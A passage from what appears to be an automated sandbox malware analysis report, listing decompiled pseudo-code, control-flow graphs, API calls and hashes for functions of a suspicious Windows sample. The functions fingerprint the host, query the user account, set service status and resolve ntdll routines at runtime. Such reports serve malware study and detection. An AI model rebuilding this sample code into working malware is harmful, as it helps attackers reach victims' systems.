                                                                                                                                  0x00404342
                                                                                                                                  0x00404345
                                                                                                                                  0x00404350
                                                                                                                                  0x00404359
                                                                                                                                  0x0040435f
                                                                                                                                  0x00404366
                                                                                                                                  0x00404371
                                                                                                                                  0x00404375
                                                                                                                                  0x00404368
                                                                                                                                  0x00404368
                                                                                                                                  0x00404368
                                                                                                                                  0x00404384
                                                                                                                                  0x0040438a
                                                                                                                                  0x0040439a
                                                                                                                                  0x004043ab
                                                                                                                                  0x004043ae
                                                                                                                                  0x004043b5
                                                                                                                                  0x00000000
                                                                                                                                  0x004043b5
                                                                                                                                  0x00404300
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                                                                  • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                                                                  • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateEvent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1371578007-0
                                                                                                                                  • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                                                                  • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                                                                  • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                                                                  • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040EC54 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24timeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 438 40ec54-40ec8f GetSystemTimeAsFileTime GetVolumeInformationA
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}






                                                                                                                                  0x0040ec5e
                                                                                                                                  0x0040ec72
                                                                                                                                  0x0040ec84
                                                                                                                                  0x0040ec89
                                                                                                                                  0x0040ec8f

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountFileInformationSystemTickVolume
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1209300637-3142137124
                                                                                                                                  • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                                                                  • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                                                                  • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404000 Relevance: 4.5, APIs: 3, Instructions: 35sleepfileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 452 404000-404008 453 40400b-40402a CreateFileA 452->453 454 404057 453->454 455 40402c-404035 GetLastError 453->455 458 404059-40405c 454->458 456 404052 455->456 457 404037-40403a 455->457 460 404054-404056 456->460 457->456 459 40403c-40403f 457->459 458->460 459->458 461 404041-404050 Sleep 459->461 461->453 461->456
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}







                                                                                                                                  0x00404001
                                                                                                                                  0x00404006
                                                                                                                                  0x00404008
                                                                                                                                  0x0040400b
                                                                                                                                  0x00404021
                                                                                                                                  0x0040402a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040402c
                                                                                                                                  0x00404035
                                                                                                                                  0x00404052
                                                                                                                                  0x00000000
                                                                                                                                  0x0040403c
                                                                                                                                  0x0040403f
                                                                                                                                  0x00404059
                                                                                                                                  0x00000000
                                                                                                                                  0x0040405b
                                                                                                                                  0x00404046
                                                                                                                                  0x0040404c
                                                                                                                                  0x00404050
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404050
                                                                                                                                  0x00404035
                                                                                                                                  0x00404057
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
                                                                                                                                  • GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
                                                                                                                                  • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 408151869-0
                                                                                                                                  • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                                                                  • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                                                                  • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                                                                  • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00416930 Relevance: 3.3, APIs: 2, Instructions: 326COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 475 416930-41697d 477 4169ab-4169bb call 40c125 475->477 478 4169c0-4169ca 477->478 479 4169d4-4169e7 478->479 480 4169cc-4169cf 478->480 482 4169f2-4169ff 479->482 481 416dba-416dcb 480->481 483 416a01-416a5d 482->483 484 416a5f-416a65 482->484 483->482 486 416c63-416c79 484->486 487 416a6b-416a6f 484->487 490 416dab-416db8 486->490 491 416c7f-416c94 486->491 487->486 489 416a75-416a96 487->489 492 416aa3 489->492 493 416a98-416aa1 489->493 490->481 494 416ca2-416cad 491->494 495 416c96-416c9c 491->495 496 416aad-416abd 492->496 493->496 499 416cbb-416cc8 494->499 500 416caf-416cb9 494->500 495->494 498 416d94-416da3 495->498 501 416ac8-416ad1 496->501 502 416da6 498->502 503 416cce-416ce2 499->503 500->503 504 416b93-416b9a 501->504 505 416ad7-416af6 501->505 502->490 510 416d79-416d8c 503->510 511 416ce8-416cec 503->511 506 416bb7-416bbd 504->506 512 416b05-416b1f 505->512 513 416af8-416b00 505->513 506->486 509 416bc3-416bc9 506->509 514 416bcf-416bd5 509->514 515 416c5e 509->515 520 416d92 510->520 511->510 516 416cf2-416d03 511->516 517 416b2a-416b3c 512->517 513->504 514->515 519 416bdb-416be4 514->519 515->506 516->510 530 416d05-416d19 516->530 521 416b8e 517->521 522 416b3e-416b8c 517->522 519->515 523 416be6-416bef 519->523 520->502 521->501 522->517 527 416c01-416c45 call 41bc00 523->527 528 416bf1-416bff 523->528 535 416c47-416c4a 527->535 536 416c4f-416c5b 527->536 528->515 528->527 533 416d1b-416d2b 530->533 534 416d2d-416d39 530->534 537 416d4b-416d61 call 41bc00 533->537 534->537 538 416d3b-416d48 534->538 535->481 536->515 541 416d63-416d66 537->541 542 416d68-416d77 537->542 538->537 541->481 542->520
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 77f48a102cc0ea0eb36cfa460e3e427b31ec91d7791bfc084f338b5a15b1cc85
                                                                                                                                  • Instruction ID: 09d6e81fcf76da4e43cf60b9f69bcbf2c181d9feaad62054433ac42e5f9b529a
                                                                                                                                  • Opcode Fuzzy Hash: 77f48a102cc0ea0eb36cfa460e3e427b31ec91d7791bfc084f338b5a15b1cc85
                                                                                                                                  • Instruction Fuzzy Hash: 7BE10B74E04248CFDB24CFA8C894BADBBB1FB49314F25825ED8656B392D7359882CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406E36 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 544 406e36-406e5d GetUserNameW 545 406ebe-406ec2 544->545 546 406e5f-406e95 LookupAccountNameW 544->546 546->545 547 406e97-406e9b 546->547 548 406ebb-406ebd 547->548 549 406e9d-406ea3 547->549 548->545 549->548 550 406ea5-406eaa 549->550 551 406eb7-406eb9 550->551 552 406eac-406eb0 550->552 551->545 552->548 553 406eb2-406eb5 552->553 553->548 553->551
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406E36(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				intOrPtr _v60;
				intOrPtr _v76;
				void _v84;
				short _v340;
				short _v860;
				int _t20;
				int _t28;
				intOrPtr _t30;
				signed int _t31;
				signed int _t32;

				_t32 = _t31 | 0xffffffff;
				_v8 = 0x104;
				_t20 = GetUserNameW( &_v860,  &_v8); // executed
				if(_t20 != 0) {
					_v8 = 0x7c;
					_v12 = 0x80;
					_t28 = LookupAccountNameW(0,  &_v860,  &_v84,  &_v8,  &_v340,  &_v12,  &_v16); // executed
					if(_t28 != 0) {
						if(_v8 < 0xc || _v76 != _a4) {
							L8:
							_t32 = 1;
						} else {
							_t30 = _a8;
							if(_t30 == 0 || _v8 >= 0x1c && _v60 == _t30) {
								_t32 = 0;
							} else {
								goto L8;
							}
						}
					}
				}
				return _t32;
			}
















                                                                                                                                  0x00406e4b
                                                                                                                                  0x00406e4e
                                                                                                                                  0x00406e55
                                                                                                                                  0x00406e5d
                                                                                                                                  0x00406e7f
                                                                                                                                  0x00406e86
                                                                                                                                  0x00406e8d
                                                                                                                                  0x00406e95
                                                                                                                                  0x00406e9b
                                                                                                                                  0x00406ebb
                                                                                                                                  0x00406ebd
                                                                                                                                  0x00406ea5
                                                                                                                                  0x00406ea5
                                                                                                                                  0x00406eaa
                                                                                                                                  0x00406eb7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406eaa
                                                                                                                                  0x00406e9b
                                                                                                                                  0x00406e95
                                                                                                                                  0x00406ec2

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
                                                                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountLookupUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2370142434-0
                                                                                                                                  • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                                                                  • Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
                                                                                                                                  • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                                                                  • Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406DC2 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 554 406dc2-406dd5 555 406e33-406e35 554->555 556 406dd7-406df1 call 406cc9 call 40ef00 554->556 561 406df4-406df9 556->561 561->561 562 406dfb-406e00 561->562 563 406e02-406e22 GetVolumeInformationA 562->563 564 406e24 562->564 563->564 565 406e2e 563->565 564->565 565->555
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				long _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0x50e39a9a
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x5e5e5e5e;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed
						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0x50e39a9a
				}
				return _t6;
			}










                                                                                                                                  0x00406dc5
                                                                                                                                  0x00406dd5
                                                                                                                                  0x00406de4
                                                                                                                                  0x00406dea
                                                                                                                                  0x00406df1
                                                                                                                                  0x00406df4
                                                                                                                                  0x00406df4
                                                                                                                                  0x00406df6
                                                                                                                                  0x00406df7
                                                                                                                                  0x00406e00
                                                                                                                                  0x00406e24
                                                                                                                                  0x00406e24
                                                                                                                                  0x00406e02
                                                                                                                                  0x00406e14
                                                                                                                                  0x00406e1a
                                                                                                                                  0x00406e22
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406e22
                                                                                                                                  0x00406e2e
                                                                                                                                  0x00406e2e
                                                                                                                                  0x00406e35

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                    • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                    • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                    • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1823874839-0
                                                                                                                                  • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                                                                  • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409892 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 566 409892-4098c0 567 4098c2-4098c5 566->567 568 4098d9 566->568 567->568 569 4098c7-4098d7 567->569 570 4098e0-4098f1 SetServiceStatus 568->570 569->570
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00409892(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t6;
				int _t7;
				signed int _t8;

				_t6 = _a4;
				 *0x413398 = _t6;
				 *0x41339c = 0 | _t6 != 0x00000002;
				 *0x4133a0 = _a8;
				 *0x4133ac = _a12;
				if(_t6 == 4 || _t6 == 1) {
					 *0x4133a8 =  *0x4133a8 & 0x00000000;
				} else {
					_t8 =  *0x41204c; // 0x2
					 *0x41204c =  *0x41204c + 1;
					 *0x4133a8 = _t8;
				}
				_t7 = SetServiceStatus( *0x413390, 0x413394); // executed
				return _t7;
			}






                                                                                                                                  0x00409892
                                                                                                                                  0x0040989e
                                                                                                                                  0x004098a3
                                                                                                                                  0x004098ad
                                                                                                                                  0x004098b7
                                                                                                                                  0x004098c0
                                                                                                                                  0x004098d9
                                                                                                                                  0x004098c7
                                                                                                                                  0x004098c7
                                                                                                                                  0x004098cc
                                                                                                                                  0x004098d2
                                                                                                                                  0x004098d2
                                                                                                                                  0x004098eb
                                                                                                                                  0x004098f1

                                                                                                                                  APIs
                                                                                                                                  • SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ServiceStatus
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3969395364-0
                                                                                                                                  • Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                                                                  • Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
                                                                                                                                  • Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                                                                  • Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00416F00 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 571 416f00-416f07 call 416e30 573 416f0c-416f10 571->573
                                                                                                                                  APIs
                                                                                                                                  • __encode_pointer.LIBCMTD ref: 00416F07
                                                                                                                                    • Part of subcall function 00416E30: __crt_wait_module_handle.LIBCMTD ref: 00416E7C
                                                                                                                                    • Part of subcall function 00416E30: RtlEncodePointer.NTDLL(?), ref: 00416EB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer__crt_wait_module_handle__encode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2010845264-0
                                                                                                                                  • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction ID: f8527b63a1fa4e1e3ea2e981291df3c9c0dfee618300b93caa5b292de4cdc523
                                                                                                                                  • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction Fuzzy Hash: 4BA0127644430833D00020877803B02390D43C0638F090021F50C051426842E4508097
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004098F2 Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 574 4098f2-4098f4 575 4098f6-409902 call 404280 574->575 578 409904-409913 Sleep 575->578 579 409917 575->579 578->575 580 409915 578->580 581 409919-409942 call 402544 call 40977c 579->581 582 40995e-409960 579->582 580->579 586 409947-409957 call 40ee2a 581->586 586->582
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E004098F2(void* __ecx) {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;

				_t5 = __ecx;
				_t6 = 0;
				while(1) {
					_t1 = E00404280(_t5, 1); // executed
					_t7 = _t1;
					_pop(_t5);
					if(_t7 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t6 = _t6 + 1;
					if(_t6 < 0xa) {
						continue;
					} else {
						_t15 = _t7;
					}
					break;
				}
				if(_t15 < 0) {
					_push(0);
					 *0x41201f = 1;
					E0040977C(_t5, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8)); // executed
					_t4 = E0040EE2A(_t5, 0x4122f8, 0, 0x100);
					 *0x41201f = 0;
					return _t4;
				}
				return _t1;
			}









                                                                                                                                  0x004098f2
                                                                                                                                  0x004098f4
                                                                                                                                  0x004098f6
                                                                                                                                  0x004098f8
                                                                                                                                  0x004098fd
                                                                                                                                  0x004098ff
                                                                                                                                  0x00409902
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00409909
                                                                                                                                  0x0040990f
                                                                                                                                  0x00409913
                                                                                                                                  0x00000000
                                                                                                                                  0x00409915
                                                                                                                                  0x00409915
                                                                                                                                  0x00409915
                                                                                                                                  0x00000000
                                                                                                                                  0x00409913
                                                                                                                                  0x00409917
                                                                                                                                  0x00409919
                                                                                                                                  0x00409932
                                                                                                                                  0x00409942
                                                                                                                                  0x0040994f
                                                                                                                                  0x00409957
                                                                                                                                  0x00000000
                                                                                                                                  0x00409957
                                                                                                                                  0x00409960

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                                                                  • Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3100162736-0
                                                                                                                                  • Opcode ID: a7cf92b023169663f82040c46e27206298971899dd868cb4962a63f067b961dd
                                                                                                                                  • Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
                                                                                                                                  • Opcode Fuzzy Hash: a7cf92b023169663f82040c46e27206298971899dd868cb4962a63f067b961dd
                                                                                                                                  • Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 00401000 Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x413918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x413918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x413918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x413918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t26 =  *0x413918; // 0x0
											_t35 = 0xfffffffa;
